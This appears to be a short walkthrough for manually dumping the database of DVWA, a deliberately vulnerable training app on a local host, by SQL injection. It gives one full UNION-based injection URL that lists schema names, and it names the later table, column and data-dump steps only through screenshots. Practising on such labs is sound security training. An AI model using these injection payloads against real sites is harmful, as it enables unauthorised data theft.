DVWA_Easy_Manualy_Dump

Extract database name

http://127.0.0.1:42001/vulnerabilities/sqli/?id=0%27union%20select%201,gRoUp_cOncaT(0x7c,schema_name,0x7c)%20fRoM%20information_schema.schemata--%20-&Submit=Submit#
union select 1,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
DVWA_LOW_DB_NAME.png

Extract tables from database

DVWA_LOW_TABLENAME.png

Extract column name from database

or

DVWA_LOW_COLUMNNAME.png Note: here column name can be from different table as well comment_id and comment is from guestbook table So Craft payload accordingly for dumping full data

EXTRACT data from table

DVWA_LOW_DATA_DUMP.png

Last updated